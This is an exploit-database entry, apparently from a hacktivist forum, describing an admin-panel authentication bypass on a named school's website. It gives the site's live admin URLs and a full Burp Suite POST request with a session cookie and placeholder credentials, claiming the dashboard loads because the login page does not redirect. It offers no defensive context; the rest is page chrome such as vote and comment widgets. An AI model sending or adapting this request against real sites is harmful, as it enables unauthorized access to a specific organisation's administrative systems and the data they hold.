Aradhana Public School NoRedirect Admin Bypass

2023.02.19

sc0field (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title : Aradhana Public School NoRedirect Admin Bypass 
# Exploit Date : 02.17.2023
# Exploit Author : sc0field
# Forum : HACKTIVIZM.ORG

Admin Panel -> 
http://apsrohru.com/admin/index.php

Admin Dashboard -> 
http://apsrohru.com/admin/dashboard.php

Exploit Method : 

http://apsrohru.com/admin/index.php
this page we send requests with burp suite

We are sending this request from the proxy point :

POST /admin/dashboard.php HTTP/1.1
Host: apsrohru.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://apsrohru.com
Connection: close
Referer: http://apsrohru.com/admin/index.php
Cookie: PHPSESSID=cpjpi29etdj7qaigoultdp8986
Upgrade-Insecure-Requests: 1

username=1&password=1&user-login=true

and exploited 

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aradhana Public School NoRedirect Admin Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.